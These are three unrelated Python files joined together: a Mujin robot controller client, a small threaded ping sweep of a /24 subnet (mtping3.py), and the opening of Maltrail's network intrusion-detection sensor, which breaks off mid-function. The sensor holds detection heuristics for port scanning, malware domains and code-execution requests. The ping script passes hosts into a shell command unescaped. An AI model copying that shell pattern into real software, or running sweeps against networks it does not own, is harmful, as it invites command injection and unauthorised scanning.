socket = self._ctx.socket(zmq.SUB)
socket.setsockopt(zmq.TCP_KEEPALIVE, 1) # turn on tcp keepalive, do these configuration before connect
socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 2) # the interval between the last data packet sent (simple ACKs are not considered data) and the first keepalive probe; after the connection is marked to need keepalive, this counter is not used any further
socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, 2) # the interval between subsequential keepalive probes, regardless of what the connection has exchanged in the meantime
socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, 2) # the number of unacknowledged probes to send before considering the connection dead and notifying the application layer
socket.connect('tcp://%s:%s' % (self.controllerIp, self.taskheartbeatport))
socket.setsockopt(zmq.SUBSCRIBE, '')
poller = zmq.Poller()
poller.register(socket, zmq.POLLIN)
lastheartbeatts = GetMonotonicTime()
while self._isokheartbeat and GetMonotonicTime() - lastheartbeatts < reinitializetimeout:
socks = dict(poller.poll(50))
if socket in socks and socks.get(socket) == zmq.POLLIN:
try:
reply = socket.recv_json(zmq.NOBLOCK)
if 'slavestates' in reply:
self._taskstate = reply.get('slavestates', {}).get('slaverequestid-%s'%self._slaverequestid, None)
lastheartbeatts = GetMonotonicTime()
else:
self._taskstate = None
except zmq.ZMQError as e:
log.exception('failed to receive from publisher: %s', e)
if self._isokheartbeat:
log.warn('%f secs since last heartbeat from controller' % (GetMonotonicTime() - lastheartbeatts))
def GetPublishedTaskState(self):
"""Return most recent published state. If publishing is disabled, then will return None
"""
if self._heartbeatthread is None or not self._isokheartbeat:
log.warn('Heartbeat thread not running taskheartbeatport=%s, so cannot get latest taskstate', self.taskheartbeatport)
return self._taskstate
def SetScenePrimaryKey(self, scenepk):
self.scenepk = scenepk
sceneuri = controllerclientbase.GetURIFromPrimaryKey(scenepk)
# for now (HACK) need to set the correct scenefilename. newer version of mujin controller need only scenepk, so remove scenefilename eventually
mujinpath = os.path.join(os.environ.get('MUJIN_MEDIA_ROOT_DIR', '/var/www/media/u'), self.controllerusername)
scenefilename = controllerclientbase.GetFilenameFromURI(sceneuri, mujinpath)[1]
self._sceneparams = {'scenetype': 'mujin', 'sceneuri': sceneuri, 'scenefilename': scenefilename, 'scale': [1.0, 1.0, 1.0]} # TODO: set scenetype according to the scene
#
# Tasks related
#
def RunSceneTaskAsync(self, scenepk, taskpk, slaverequestid=None, fields=None, usewebapi=True, timeout=5):
"""
:return: {'jobpk': 'xxx', 'msg': 'xxx'}
Notice: This overwrites the base in controllerclientbase, to accept slaverequestid.
"""
assert(usewebapi)
if slaverequestid is None:
slaverequestid = self._slaverequestid
data = {
'scenepk': scenepk,
'target_pk': taskpk,
'resource_type': 'task',
'slaverequestid': slaverequestid,
}
return self._webclient.APICall('POST', u'job/', data=data, expectedStatusCode=200, timeout=timeout)
def ExecuteTaskSync(self, scenepk, tasktype, taskparameters, slaverequestid='', timeout=None):
'''Executes task with a particular task type without creating a new task
:param taskparameters: A dictionary with the following values: targetname, destinationname, robot, command, manipname, returntostart, samplingtime
:param forcecancel: If True, cancel all previously running jobs before running this one
'''
# Execute task
try:
return self._webclient.APICall('GET', u'scene/%s/resultget' % (scenepk), data={
'tasktype': tasktype,
'taskparameters': taskparameters,
'slaverequestid': slaverequestid,
'timeout': timeout,
}, timeout=timeout)
except Exception as e:
import traceback
log.warn('Failed in executing sync command through webstack, exception was %s, perhaps planning server or planning slave is not responding, or another sync command is going on? scenepk=%r, tasktype=%r, taskparameters=%r, slaverequestid=%r. Coming from:\n%s', e, scenepk, tasktype, taskparameters, slaverequestid, ''.join(traceback.format_stack()))
raise
def _ExecuteCommandViaWebAPI(self, taskparameters, slaverequestid='', timeout=None):
"""Executes command via web api
"""
return self.ExecuteTaskSync(self.scenepk, self.tasktype, taskparameters, slaverequestid=slaverequestid, timeout=timeout)
def _ExecuteCommandViaZMQ(self, taskparameters, slaverequestid='', timeout=None, fireandforget=None, checkpreempt=True, respawnopts=None):
command = {
'fnname': 'RunCommand',
'taskparams': {
'tasktype': self.tasktype,
'sceneparams': self._sceneparams,
'taskparameters': taskparameters,
},
'userinfo': self._userinfo,
'slaverequestid': slaverequestid,
'stamp': time.time(),
'respawnopts': respawnopts,
}
if self.tasktype == 'binpicking':
command['fnname'] = '%s.%s' % (self.tasktype, command['fnname'])
response = self._commandsocket.SendCommand(command, timeout=timeout, fireandforget=fireandforget, checkpreempt=checkpreempt)
if fireandforget:
# For fire and forget commands, no response will be available
return None
error = GetAPIServerErrorFromZMQ(response)
if error is not None:
log.warn('GetAPIServerErrorFromZMQ returned error for %r', response)
raise error
if response is None:
log.warn(u'got no response from task %r', taskparameters)
return None
return response['output']
def ExecuteCommand(self, taskparameters, usewebapi=None, slaverequestid=None, timeout=None, fireandforget=None, respawnopts=None):
"""Executes command with taskparameters
:param taskparameters: Task parameters in json format
:param timeout: Timeout in seconds for web api call
:param fireandforget: Whether we should return immediately after sending the command
:return: Server response in json format
"""
if 'stamp' not in taskparameters:
taskparameters['stamp'] = time.time()
# log.debug('Executing task with parameters: %r', taskparameters)
if slaverequestid is None:
slaverequestid = self._slaverequestid
if usewebapi is None:
usewebapi = self._usewebapi
if usewebapi:
return self._ExecuteCommandViaWebAPI(taskparameters, timeout=timeout, slaverequestid=slaverequestid)
else:
return self._ExecuteCommandViaZMQ(taskparameters, timeout=timeout, slaverequestid=slaverequestid, fireandforget=fireandforget, respawnopts=respawnopts)
#
# Config
#
def Configure(self, configuration, usewebapi=None, timeout=None, fireandforget=None):
configuration['command'] = 'configure'
return self.SendConfig(configuration, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def SetLogLevel(self, componentLevels, fireandforget=None, timeout=5):
"""Set webstack and planning log level
:param componentLevels: Mapping from component name to level name, for example {"some.specific.component": "DEBUG"}
If component name is empty string, it sets the root logger
If level name is empty string, it unsets the level previously set
"""
super(PlanningControllerClient, self).SetLogLevel(componentLevels, timeout=timeout)
configuration = {
'command': 'setloglevel',
'componentLevels': componentLevels
}
return self.SendConfig(configuration, timeout=timeout, fireandforget=fireandforget)
def SendConfig(self, command, usewebapi=None, slaverequestid=None, timeout=None, fireandforget=None):
# log.debug('Send config: %r', command)
if slaverequestid is None:
slaverequestid = self._slaverequestid
return self._SendConfigViaZMQ(command, slaverequestid=slaverequestid, timeout=timeout, fireandforget=fireandforget)
def _SendConfigViaZMQ(self, command, slaverequestid='', timeout=None, fireandforget=None, checkpreempt=True):
command['slaverequestid'] = slaverequestid
response = self._configsocket.SendCommand(command, timeout=timeout, fireandforget=fireandforget, checkpreempt=checkpreempt)
if fireandforget:
# For fire and forget commands, no response will be available
return None
error = GetAPIServerErrorFromZMQ(response)
if error is not None:
raise error
return response['output']
#
# Viewer Parameters Related
#
def SetViewerFromParameters(self, viewerparameters, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewerparameters.update(kwargs)
return self.Configure({'viewerparameters': viewerparameters}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraZoomOut(self, zoommult=0.9, zoomdelta=20, usewebapi=False, timeout=10, fireandforget=True, ispan=True, **kwargs):
viewercommand = {
'command': 'MoveCameraZoomOut',
'zoomdelta': float(zoomdelta),
'zoommult': float(zoommult),
'ispan': bool(ispan)
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraZoomIn(self, zoommult=0.9, zoomdelta=20, usewebapi=False, timeout=10, fireandforget=True, ispan=True, **kwargs):
viewercommand = {
'command': 'MoveCameraZoomIn',
'zoomdelta': float(zoomdelta),
'zoommult': float(zoommult),
'ispan': bool(ispan)
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraLeft(self, ispan=True, panangle=5.0, pandelta=0.04, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewercommand = {
'command': 'MoveCameraLeft',
'pandelta': float(pandelta),
'panangle': float(panangle),
'ispan': bool(ispan),
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraRight(self, ispan=True, panangle=5.0, pandelta=0.04, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewercommand = {
'command': 'MoveCameraRight',
'pandelta': float(pandelta),
'panangle': float(panangle),
'ispan': bool(ispan),
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraUp(self, ispan=True, angledelta=3.0, pandelta=0.04, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewercommand = {
'command': 'MoveCameraUp',
'pandelta': float(pandelta),
'angledelta': float(angledelta),
'ispan': bool(ispan),
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraDown(self, ispan=True, angledelta=3.0, pandelta=0.04, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
viewercommand = {
'command': 'MoveCameraDown',
'pandelta': float(pandelta),
'angledelta': float(angledelta),
'ispan': bool(ispan),
}
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def MoveCameraPointOfView(self, pointOfViewName, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
"""
Sends a command that moves the camera to one of the following point of view names:
+x, -x, +y, -y, +z, -z.
For each point of view, the camera will be aligned to the scene's bounding box center, and the whole scene will be visible. The camera will look at the
scene from the opposite direction of the point of view's name's axis (for instance, the camera placed at +x will look at the scene from the -x direction).
"""
viewercommand = {
'command': 'MoveCameraPointOfView',
'axis': pointOfViewName,
}
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def SetCameraTransform(self, pose=None, transform=None, distanceToFocus=0.0, usewebapi=False, timeout=10, fireandforget=True, **kwargs):
"""Sets the camera transform
:param transform: 4x4 matrix
"""
viewercommand = {
'command': 'SetCameraTransform',
'distanceToFocus': float(distanceToFocus),
}
if transform is not None:
viewercommand['transform'] = [list(row) for row in transform]
if pose is not None:
viewercommand['pose'] = [float(f) for f in pose]
viewercommand.update(kwargs)
return self.Configure({'viewercommand': viewercommand}, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def StartIPython(self, timeout=1, usewebapi=False, fireandforget=True, **kwargs):
configuration = {'startipython': True}
configuration.update(kwargs)
return self.Configure(configuration, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)
|
mtping3.py
|
import subprocess
import threading
class Ping:
def __init__(self, host):
self.host = host
def __call__(self):
result = subprocess.run(
'ping -c2 %s &> /dev/null' % self.host,
shell=True
)
if result.returncode == 0:
print('%s:up' % self.host)
else:
print('%s:down' % self.host)
if __name__ == '__main__':
ips = ('172.40.59.%s' % i for i in range(1, 255))
for ip in ips:
t = threading.Thread(target=Ping(ip)) # 创建实例
t.start() # target() # 调用实例
|
sensor.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2020 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import cProfile
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
from core.addr import inet_ntoa6
from core.addr import addr_port
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import get_ex_message
from core.common import get_text
from core.common import is_local
from core.common import load_trails
from core.compat import xrange
from core.datatype import LRUDict
from core.enums import BLOCK_MARKER
from core.enums import CACHE_TYPE
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import flush_condensed_events
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import GENERIC_SINKHOLE_REGEX
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import IS_WIN
from core.settings import LOCALHOST_IP
from core.settings import LOCAL_SUBDOMAIN_LOOKUPS
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import INFECTION_SCANNING_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import POTENTIAL_INFECTION_PORTS
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DIRECT_IP_URL_REGEX
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import VALID_DNS_NAME_REGEX
from core.settings import trails
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_REGEX
from core.update import update_ipcat
from core.update import update_trails
from thirdparty import six
from thirdparty.six.moves import urllib as _urllib
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = LRUDict(MAX_RESULT_CACHE_ENTRIES)
_local_cache = {}
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
try:
import pcapy
except ImportError:
if IS_WIN:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg = "[!] please install 'Pcapy' (e.g. 'sudo pip%s install pcapy')" % ('3' if six.PY3 else '2')
exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
result = _result_cache.get((CACHE_TYPE.DOMAIN_WHITELISTED, query))
if result is None:
result = _check_domain_member(re.split(r"(?i)[^A-Z0-9._-]", query or "")[0], WHITELIST)
_result_cache[(CACHE_TYPE.DOMAIN_WHITELISTED, query)] = result
return result
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if query:
query = query.lower()
if ':' in query:
query = query.split(':', 1)[0]
if query.replace('.', "").isdigit(): # IP address
return
if _result_cache.get((CACHE_TYPE.DOMAIN, query)) == False:
return
result = False
if re.search(VALID_DNS_NAME_REGEX, query) is not None and not _check_domain_whitelisted(query):
parts = query.split('.')
if trails._regex:
match = re.search(trails._regex, query)
if match:
group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
if candidate in trails:
result = True
trail = match.group(0)
prefix, suffix = query[:match.start()], query[match.end():]
if prefix:
trail = "(%s)%s" % (prefix, trail)
if suffix:
trail = "%s(%s)" % (trail, suffix)
trail = trail.replace(".)", ").")
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
if ".onion." in query:
trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
_ = trail.split('(')[0]
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
elif query.endswith(".ip-adress.com"): # Reference: https://www.virustotal.com/gui/domain/ip-adress.com/relations
_ = '.'.join(parts[:-2])
trail = "%s(.ip-adress.com)" % _
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if not result:
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
if not (re.search(r"(?i)\A([rd]?ns|nf|mx|nic)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))): # e.g. ns2.nobel.su
if not ((query == trail or parts[0] == "www") and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))): # e.g. noip.com
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if result == False:
_result_cache[(CACHE_TYPE.DOMAIN, query)] = False
def _get_local_prefix():
_sources = set(_.split('~')[0] for _ in _connect_src_dst.keys())
_candidates = [re.sub(r"\d+\.\d+\Z", "", _) for _ in _sources]
_ = sorted(((_candidates.count(_), _) for _ in set(_candidates)), reverse=True)
result = _[0][1] if _ else ""
if result:
_result_cache[(CACHE_TYPE.LOCAL_PREFIX, "")] = result
else:
result = _result_cache.get((CACHE_TYPE.LOCAL_PREFIX, ""))
return result or '_'
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
_src_ip, _dst = key.split('~')
if not _dst.isdigit() and len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
if not check_whitelisted(_src_ip):
_dst_ip = _dst
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
elif len(_connect_src_dst[key]) > INFECTION_SCANNING_THRESHOLD:
_dst_port = _dst
_dst_ip = [_[-1] for _ in _connect_src_details[key]]
_src_port = [_[-2] for _ in _connect_src_details[key]]
if len(_dst_ip) == len(set(_dst_ip)):
if _src_ip.startswith(_get_local_prefix()):
log_event((sec, usec, _src_ip, _src_port[0], _dst_ip[0], _dst_port, PROTO.TCP, TRAIL.PORT, _dst_port, "potential infection", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0:1]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or addr_port(dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(dst_ip, dst_port)
if trail not in trails:
trail = dst_ip
if not any(_ in trails[trail][0] for _ in ("attacker",)) and not ("parking site" in trails[trail][0] and dst_port not in (80, 443)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or addr_port(src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(src_ip, src_port)
if trail not in trails:
trail = src_ip
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
if dst_port in POTENTIAL_INFECTION_PORTS:
key = "%s~%s" % (src_ip, dst_port)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_ip)
_connect_src_details[key].add((sec, usec, src_port, dst_ip))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = get_text(ip_data[h_size:])
if tcp_data.startswith("HTTP/"):
match = re.search(GENERIC_SINKHOLE_REGEX, tcp_data[:2000])
if match:
trail = match.group(0)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
if " HTTP/" in tcp_data:
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif re.search(r"\A\d+\.[0-9.]+\Z", host or "") and re.search(SUSPICIOUS_DIRECT_IP_URL_REGEX, "%s%s" % (host, path)):
if not _dst_ip.startswith(_get_local_prefix()):
trail = "(%s)%s" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential iot-malware download (suspicious)", "(heuristic)"), packet)
return
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
unquoted_path = _urllib.parse.unquote(path)
key = "code execution"
if key not in _local_cache:
_local_cache[key] = next(_[1] for _ in SUSPICIOUS_HTTP_REQUEST_REGEXES if "code execution" in _[0])
if re.search(_local_cache[key], unquoted_path, re.I) is None: # NOTE: to prevent malware domain FPs in case of outside scanners
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = _urllib.parse.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get((CACHE_TYPE.USER_AGENT, user_agent))
if result is None:
if re.search(WHITELIST_UA_REGEX, user_agent, re.I) is None:
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
unquoted_path = _urllib.parse.unquote(path)
unquoted_post_data = _urllib.parse.unquote(post_data or "")
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
elif post_data:
checks.append("%s?%s" % (path, unquoted_post_data.lower()))
#_ = os.path.splitext(checks[-1]) # causing FPs in cases like elf_mirai - /juno if legit /juno.php is accessed
#if _[1]:
#checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
if '?' not in path and '?' in check and post_data:
